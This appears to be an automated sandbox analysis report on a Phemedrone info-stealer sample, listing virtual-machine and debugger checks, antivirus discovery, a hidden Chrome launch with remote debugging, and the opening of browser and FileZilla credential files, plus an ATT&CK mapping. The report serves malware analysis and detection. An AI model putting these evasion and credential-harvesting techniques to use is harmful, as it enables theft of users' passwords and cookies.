Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)

Source: C:\Users\user\Desktop\R9rwNLVzpr.exe

WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Source: C:\Users\user\Desktop\R9rwNLVzpr.exe

WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController

Source: C:\Users\user\Desktop\R9rwNLVzpr.exe	Memory allocated: 1550000 memory reserve \| memory write watch			Jump to behavior
Source: C:\Users\user\Desktop\R9rwNLVzpr.exe	Memory allocated: 1B3E0000 memory reserve \| memory write watch			Jump to behavior

Source: C:\Users\user\Desktop\R9rwNLVzpr.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\R9rwNLVzpr.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Users\user\Desktop\R9rwNLVzpr.exe	Thread delayed: delay time: 599682	Jump to behavior
Source: C:\Users\user\Desktop\R9rwNLVzpr.exe	Thread delayed: delay time: 599524	Jump to behavior
Source: C:\Users\user\Desktop\R9rwNLVzpr.exe	Thread delayed: delay time: 599283	Jump to behavior
Source: C:\Users\user\Desktop\R9rwNLVzpr.exe	Thread delayed: delay time: 598947	Jump to behavior
Source: C:\Users\user\Desktop\R9rwNLVzpr.exe	Thread delayed: delay time: 598710	Jump to behavior
Source: C:\Users\user\Desktop\R9rwNLVzpr.exe	Thread delayed: delay time: 598596	Jump to behavior
Source: C:\Users\user\Desktop\R9rwNLVzpr.exe	Thread delayed: delay time: 598468	Jump to behavior
Source: C:\Users\user\Desktop\R9rwNLVzpr.exe	Thread delayed: delay time: 598356	Jump to behavior
Source: C:\Users\user\Desktop\R9rwNLVzpr.exe	Thread delayed: delay time: 598244	Jump to behavior
Source: C:\Users\user\Desktop\R9rwNLVzpr.exe	Thread delayed: delay time: 598133	Jump to behavior
Source: C:\Users\user\Desktop\R9rwNLVzpr.exe	Thread delayed: delay time: 598012	Jump to behavior
Source: C:\Users\user\Desktop\R9rwNLVzpr.exe	Thread delayed: delay time: 597903	Jump to behavior
Source: C:\Users\user\Desktop\R9rwNLVzpr.exe	Thread delayed: delay time: 597794	Jump to behavior
Source: C:\Users\user\Desktop\R9rwNLVzpr.exe	Thread delayed: delay time: 597678	Jump to behavior
Source: C:\Users\user\Desktop\R9rwNLVzpr.exe	Thread delayed: delay time: 597544	Jump to behavior
Source: C:\Users\user\Desktop\R9rwNLVzpr.exe	Thread delayed: delay time: 597429	Jump to behavior
Source: C:\Users\user\Desktop\R9rwNLVzpr.exe	Thread delayed: delay time: 597321	Jump to behavior
Source: C:\Users\user\Desktop\R9rwNLVzpr.exe	Thread delayed: delay time: 597209	Jump to behavior
Source: C:\Users\user\Desktop\R9rwNLVzpr.exe	Thread delayed: delay time: 597082	Jump to behavior
Source: C:\Users\user\Desktop\R9rwNLVzpr.exe	Thread delayed: delay time: 596955	Jump to behavior
Source: C:\Users\user\Desktop\R9rwNLVzpr.exe	Thread delayed: delay time: 596827	Jump to behavior
Source: C:\Users\user\Desktop\R9rwNLVzpr.exe	Thread delayed: delay time: 596703	Jump to behavior
Source: C:\Users\user\Desktop\R9rwNLVzpr.exe	Thread delayed: delay time: 596586	Jump to behavior
Source: C:\Users\user\Desktop\R9rwNLVzpr.exe	Thread delayed: delay time: 596474	Jump to behavior
Source: C:\Users\user\Desktop\R9rwNLVzpr.exe	Thread delayed: delay time: 596076	Jump to behavior
Source: C:\Users\user\Desktop\R9rwNLVzpr.exe	Thread delayed: delay time: 595773	Jump to behavior
Source: C:\Users\user\Desktop\R9rwNLVzpr.exe	Thread delayed: delay time: 595384	Jump to behavior
Source: C:\Users\user\Desktop\R9rwNLVzpr.exe	Thread delayed: delay time: 595236	Jump to behavior
Source: C:\Users\user\Desktop\R9rwNLVzpr.exe	Thread delayed: delay time: 595025	Jump to behavior
Source: C:\Users\user\Desktop\R9rwNLVzpr.exe	Thread delayed: delay time: 594913	Jump to behavior
Source: C:\Users\user\Desktop\R9rwNLVzpr.exe	Thread delayed: delay time: 587748	Jump to behavior
Source: C:\Users\user\Desktop\R9rwNLVzpr.exe	Thread delayed: delay time: 587620	Jump to behavior

Source: C:\Users\user\Desktop\R9rwNLVzpr.exe	Window / User API: threadDelayed 2324			Jump to behavior
Source: C:\Users\user\Desktop\R9rwNLVzpr.exe	Window / User API: threadDelayed 2648			Jump to behavior

Source: C:\Users\user\Desktop\R9rwNLVzpr.exe TID: 8832	Thread sleep time: -15679732462653109s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\R9rwNLVzpr.exe TID: 8832	Thread sleep time: -600000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\R9rwNLVzpr.exe TID: 8832	Thread sleep time: -599682s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\R9rwNLVzpr.exe TID: 8832	Thread sleep time: -599524s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\R9rwNLVzpr.exe TID: 8832	Thread sleep time: -599283s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\R9rwNLVzpr.exe TID: 8832	Thread sleep time: -598947s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\R9rwNLVzpr.exe TID: 8832	Thread sleep time: -598710s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\R9rwNLVzpr.exe TID: 8832	Thread sleep time: -598596s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\R9rwNLVzpr.exe TID: 8832	Thread sleep time: -598468s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\R9rwNLVzpr.exe TID: 8832	Thread sleep time: -598356s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\R9rwNLVzpr.exe TID: 8832	Thread sleep time: -598244s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\R9rwNLVzpr.exe TID: 8832	Thread sleep time: -598133s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\R9rwNLVzpr.exe TID: 8832	Thread sleep time: -598012s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\R9rwNLVzpr.exe TID: 8832	Thread sleep time: -597903s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\R9rwNLVzpr.exe TID: 8832	Thread sleep time: -597794s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\R9rwNLVzpr.exe TID: 8832	Thread sleep time: -597678s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\R9rwNLVzpr.exe TID: 8832	Thread sleep time: -597544s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\R9rwNLVzpr.exe TID: 8832	Thread sleep time: -597429s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\R9rwNLVzpr.exe TID: 8832	Thread sleep time: -597321s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\R9rwNLVzpr.exe TID: 8832	Thread sleep time: -597209s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\R9rwNLVzpr.exe TID: 8832	Thread sleep time: -597082s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\R9rwNLVzpr.exe TID: 8832	Thread sleep time: -596955s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\R9rwNLVzpr.exe TID: 8832	Thread sleep time: -596827s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\R9rwNLVzpr.exe TID: 8832	Thread sleep time: -596703s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\R9rwNLVzpr.exe TID: 8832	Thread sleep time: -596586s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\R9rwNLVzpr.exe TID: 8832	Thread sleep time: -596474s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\R9rwNLVzpr.exe TID: 8832	Thread sleep time: -596076s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\R9rwNLVzpr.exe TID: 8832	Thread sleep time: -595773s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\R9rwNLVzpr.exe TID: 8832	Thread sleep time: -595384s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\R9rwNLVzpr.exe TID: 8832	Thread sleep time: -595236s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\R9rwNLVzpr.exe TID: 8832	Thread sleep time: -595025s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\R9rwNLVzpr.exe TID: 8832	Thread sleep time: -594913s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\R9rwNLVzpr.exe TID: 8832	Thread sleep time: -587748s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\R9rwNLVzpr.exe TID: 8832	Thread sleep time: -587620s >= -30000s	Jump to behavior

Source: C:\Users\user\Desktop\R9rwNLVzpr.exe

WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_ComputerSystem

Source: C:\Users\user\Desktop\R9rwNLVzpr.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\Desktop\R9rwNLVzpr.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor

Source: C:\Users\user\Desktop\R9rwNLVzpr.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\R9rwNLVzpr.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Users\user\Desktop\R9rwNLVzpr.exe	Thread delayed: delay time: 599682	Jump to behavior
Source: C:\Users\user\Desktop\R9rwNLVzpr.exe	Thread delayed: delay time: 599524	Jump to behavior
Source: C:\Users\user\Desktop\R9rwNLVzpr.exe	Thread delayed: delay time: 599283	Jump to behavior
Source: C:\Users\user\Desktop\R9rwNLVzpr.exe	Thread delayed: delay time: 598947	Jump to behavior
Source: C:\Users\user\Desktop\R9rwNLVzpr.exe	Thread delayed: delay time: 598710	Jump to behavior
Source: C:\Users\user\Desktop\R9rwNLVzpr.exe	Thread delayed: delay time: 598596	Jump to behavior
Source: C:\Users\user\Desktop\R9rwNLVzpr.exe	Thread delayed: delay time: 598468	Jump to behavior
Source: C:\Users\user\Desktop\R9rwNLVzpr.exe	Thread delayed: delay time: 598356	Jump to behavior
Source: C:\Users\user\Desktop\R9rwNLVzpr.exe	Thread delayed: delay time: 598244	Jump to behavior
Source: C:\Users\user\Desktop\R9rwNLVzpr.exe	Thread delayed: delay time: 598133	Jump to behavior
Source: C:\Users\user\Desktop\R9rwNLVzpr.exe	Thread delayed: delay time: 598012	Jump to behavior
Source: C:\Users\user\Desktop\R9rwNLVzpr.exe	Thread delayed: delay time: 597903	Jump to behavior
Source: C:\Users\user\Desktop\R9rwNLVzpr.exe	Thread delayed: delay time: 597794	Jump to behavior
Source: C:\Users\user\Desktop\R9rwNLVzpr.exe	Thread delayed: delay time: 597678	Jump to behavior
Source: C:\Users\user\Desktop\R9rwNLVzpr.exe	Thread delayed: delay time: 597544	Jump to behavior
Source: C:\Users\user\Desktop\R9rwNLVzpr.exe	Thread delayed: delay time: 597429	Jump to behavior
Source: C:\Users\user\Desktop\R9rwNLVzpr.exe	Thread delayed: delay time: 597321	Jump to behavior
Source: C:\Users\user\Desktop\R9rwNLVzpr.exe	Thread delayed: delay time: 597209	Jump to behavior
Source: C:\Users\user\Desktop\R9rwNLVzpr.exe	Thread delayed: delay time: 597082	Jump to behavior
Source: C:\Users\user\Desktop\R9rwNLVzpr.exe	Thread delayed: delay time: 596955	Jump to behavior
Source: C:\Users\user\Desktop\R9rwNLVzpr.exe	Thread delayed: delay time: 596827	Jump to behavior
Source: C:\Users\user\Desktop\R9rwNLVzpr.exe	Thread delayed: delay time: 596703	Jump to behavior
Source: C:\Users\user\Desktop\R9rwNLVzpr.exe	Thread delayed: delay time: 596586	Jump to behavior
Source: C:\Users\user\Desktop\R9rwNLVzpr.exe	Thread delayed: delay time: 596474	Jump to behavior
Source: C:\Users\user\Desktop\R9rwNLVzpr.exe	Thread delayed: delay time: 596076	Jump to behavior
Source: C:\Users\user\Desktop\R9rwNLVzpr.exe	Thread delayed: delay time: 595773	Jump to behavior
Source: C:\Users\user\Desktop\R9rwNLVzpr.exe	Thread delayed: delay time: 595384	Jump to behavior
Source: C:\Users\user\Desktop\R9rwNLVzpr.exe	Thread delayed: delay time: 595236	Jump to behavior
Source: C:\Users\user\Desktop\R9rwNLVzpr.exe	Thread delayed: delay time: 595025	Jump to behavior
Source: C:\Users\user\Desktop\R9rwNLVzpr.exe	Thread delayed: delay time: 594913	Jump to behavior
Source: C:\Users\user\Desktop\R9rwNLVzpr.exe	Thread delayed: delay time: 587748	Jump to behavior
Source: C:\Users\user\Desktop\R9rwNLVzpr.exe	Thread delayed: delay time: 587620	Jump to behavior

Source: Amcache.hve.16.dr	Binary or memory string: VMware
Source: chrome.exe, 00000006.00000002.1393953514.000002570501D000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V Dynamic Memory Integration Service
Source: chrome.exe, 00000006.00000002.1432805386.0000025708B91000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V HypervisorKh
Source: chrome.exe, 00000006.00000002.1461564252.000017D400E14000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: a5dcbf10-6530-11d2-901f-00c04fb951ed} vendor=3599 "VMware", product=3 "VMware Virtual USB Mouse", serial="", driver="usbccgp", guid=8b04b21e-7093-4eca-878b-c8c1e52353f3 c
Source: Amcache.hve.16.dr	Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: chrome.exe, 00000006.00000002.1432805386.0000025708BB7000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: DHyper-V Virtual Machine Bus Pipes
Source: chrome.exe, 00000006.00000002.1393953514.0000025704FAE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V Dynamic Memory Integration Service &
Source: Amcache.hve.16.dr	Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
Source: chrome.exe, 00000006.00000002.1432805386.0000025708BB7000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V Hypervisor Root Partition
Source: Amcache.hve.16.dr	Binary or memory string: vmci.sys
Source: chrome.exe, 00000006.00000002.1432805386.0000025708BB7000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V Virtual Machine Bus Pipes
Source: chrome.exe, 00000006.00000002.1432805386.0000025708BB7000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: DHyper-V Hypervisor Root Partition%
Source: chrome.exe, 00000006.00000002.1432805386.0000025708B6E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: THyper-V Hypervisor Root Virtual Processorchez
Source: Amcache.hve.16.dr	Binary or memory string: VMware20,1
Source: Amcache.hve.16.dr	Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.16.dr	Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.16.dr	Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: Amcache.hve.16.dr	Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.16.dr	Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: Amcache.hve.16.dr	Binary or memory string: VMware PCI VMCI Bus Device
Source: Amcache.hve.16.dr	Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.24224532.B64.2408191502,BiosReleaseDate:08/19/2024,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: Amcache.hve.16.dr	Binary or memory string: VMware VMCI Bus Device
Source: chrome.exe, 00000006.00000002.1432805386.0000025708BB7000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V ummjbmknxgwqcta Bus Pipes
Source: Amcache.hve.16.dr	Binary or memory string: vmci.inf_amd64_68ed49469341f563
Source: chrome.exe, 00000006.00000002.1432805386.0000025708BB7000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V Hypervisor Root Virtual Processor
Source: Amcache.hve.16.dr	Binary or memory string: VMware Virtual USB Mouse
Source: Amcache.hve.16.dr	Binary or memory string: vmci.syshbin
Source: Amcache.hve.16.dr	Binary or memory string: VMware, Inc.
Source: chrome.exe, 00000006.00000002.1393953514.0000025704FAE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: JHyper-V Hypervisor Logical ProcessorDN
Source: Amcache.hve.16.dr	Binary or memory string: VMware20,1hbin@
Source: Amcache.hve.16.dr	Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
Source: Amcache.hve.16.dr	Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.16.dr	Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: chrome.exe, 00000006.00000003.1315754550.000017D4002F4000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: VMware20,1(
Source: chrome.exe, 00000006.00000002.1432805386.0000025708BB7000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: &Hyper-V Hypervisor
Source: Amcache.hve.16.dr	Binary or memory string: c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.16.dr	Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: R9rwNLVzpr.exe, 00000001.00000002.1583254528.0000000001603000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.1393953514.0000025704F6A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: Amcache.hve.16.dr	Binary or memory string: VMware Virtual RAMX
Source: Amcache.hve.16.dr	Binary or memory string: VMware-42 27 d9 2e dc 89 72 dd-92 e8 86 9f a5 a6 64 93
Source: Amcache.hve.16.dr	Binary or memory string: vmci.syshbin`
Source: Amcache.hve.16.dr	Binary or memory string: \driver\vmci,\driver\pci
Source: Amcache.hve.16.dr	Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: chrome.exe, 00000006.00000002.1432805386.0000025708B50000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V ummjbmknxgwqcta Bus*
Source: chrome.exe, 00000006.00000002.1432805386.0000025708BB7000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V Hypervisor Logical Processor.0
Source: chrome.exe, 00000006.00000002.1461564252.000017D400E14000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: a5dcbf10-6530-11d2-901f-00c04fb951ed} vendor=3599 "VMware", product=3 "VMware Virtual USB Mouse", serial="", driver="usbccgp", guid=8b04b21e-7093-4eca-878b-c8c1e52353f3
Source: Amcache.hve.16.dr	Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: chrome.exe, 00000006.00000002.1432805386.0000025708BB7000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VHyper-V Dynamic Memory Integration Serviceq
Source: chrome.exe, 00000006.00000002.1483302212.00007FF815531000.00000020.00000001.01000000.00000007.sdmp	Binary or memory string: xVMcI
Source: chrome.exe, 00000006.00000002.1475993663.000017D401788000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: USB device added: path=\\?\usb#vid_0e0f&pid_0003#5&2dda038&0&5#{a5dcbf10-6530-11d2-901f-00c04fb951ed} vendor=3599 "VMware", product=3 "VMware Virtual USB Mouse", serial="", driver="usbccgp", guid=8b04b21e-7093-4eca-878b-c8c1e52353f3

Source: C:\Users\user\Desktop\R9rwNLVzpr.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\R9rwNLVzpr.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Users\user\Desktop\R9rwNLVzpr.exe	Process queried: DebugPort			Jump to behavior

Source: C:\Users\user\Desktop\R9rwNLVzpr.exe

Process token adjusted: Debug

Jump to behavior

Source: C:\Users\user\Desktop\R9rwNLVzpr.exe

Memory allocated: page read and write | page guard

Jump to behavior

Source: C:\Users\user\Desktop\R9rwNLVzpr.exe

Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --window-position=-2400,-2400 --remote-debugging-port=9222 --profile-directory="Default"

Jump to behavior

Source: C:\Users\user\Desktop\R9rwNLVzpr.exe	Queries volume information: C:\Users\user\Desktop\R9rwNLVzpr.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\R9rwNLVzpr.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\R9rwNLVzpr.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\R9rwNLVzpr.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\R9rwNLVzpr.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\R9rwNLVzpr.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\R9rwNLVzpr.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: Amcache.hve.16.dr	Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: Amcache.hve.16.dr	Binary or memory string: msmpeng.exe
Source: Amcache.hve.16.dr	Binary or memory string: c:\program files\windows defender\msmpeng.exe
Source: R9rwNLVzpr.exe, 00000001.00000002.1590911722.000000001C054000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
Source: Amcache.hve.16.dr	Binary or memory string: MsMpEng.exe

Source: C:\Users\user\Desktop\R9rwNLVzpr.exe

WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntivirusProduct

Stealing of Sensitive Information

Yara detected Generic Stealer

Source: Yara match	File source: 00000001.00000002.1586631205.00000000136D8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.1584357920.00000000034E2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: R9rwNLVzpr.exe PID: 7924, type: MEMORYSTR

Yara detected Phemedrone Stealer

Source: Yara match	File source: 00000001.00000002.1584357920.0000000003868000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.1584357920.00000000036C7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.1586631205.00000000136D8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.1584357920.00000000034E2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.1584357920.00000000036FA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: R9rwNLVzpr.exe PID: 7924, type: MEMORYSTR

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\Desktop\R9rwNLVzpr.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\R9rwNLVzpr.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Users\user\Desktop\R9rwNLVzpr.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\R9rwNLVzpr.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\R9rwNLVzpr.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\key4.db	Jump to behavior
Source: C:\Users\user\Desktop\R9rwNLVzpr.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior

Tries to harvest and steal ftp login credentials

Source: C:\Users\user\Desktop\R9rwNLVzpr.exe	File opened: C:\Users\user\AppData\Roaming\FileZilla\sitemanager.xml			Jump to behavior
Source: C:\Users\user\Desktop\R9rwNLVzpr.exe	File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml			Jump to behavior

Remote Access Functionality

Attempt to bypass Chrome Application-Bound Encryption

Source: C:\Users\user\Desktop\R9rwNLVzpr.exe

Yara detected Generic Stealer

Source: Yara match	File source: 00000001.00000002.1586631205.00000000136D8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.1584357920.00000000034E2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: R9rwNLVzpr.exe PID: 7924, type: MEMORYSTR

Yara detected Phemedrone Stealer

Source: Yara match	File source: 00000001.00000002.1584357920.0000000003868000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.1584357920.00000000036C7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.1586631205.00000000136D8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.1584357920.00000000034E2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.1584357920.00000000036FA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: R9rwNLVzpr.exe PID: 7924, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	231 Windows Management Instrumentation	1 DLL Side-Loading	11 Process Injection	1 Disable or Modify Tools	2 OS Credential Dumping	251 Security Software Discovery	Remote Services	2 Data from Local System	1 Web Service	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	1 DLL Side-Loading	261 Virtualization/Sandbox Evasion	LSASS Memory	2 Process Discovery	Remote Desktop Protocol	Data from Removable Media	1 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	1 Extra Window Memory Injection	11 Process Injection	Security Account Manager	261 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	Data from Network Shared Drive	1 Remote Access Software	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	1 Obfuscated Files or Information	NTDS	1 Application Window Discovery	Distributed Component Object Model	Input Capture	1 Ingress Tool Transfer	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 Software Packing	LSA Secrets	124 System Information Discovery	SSH	Keylogging	3 Non-Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 DLL Side-Loading	Cached Domain Credentials	Wi-Fi Discovery	VNC	GUI Input Capture	4 Application Layer Protocol	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 Extra Window Memory Injection	DCSync	Remote System Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
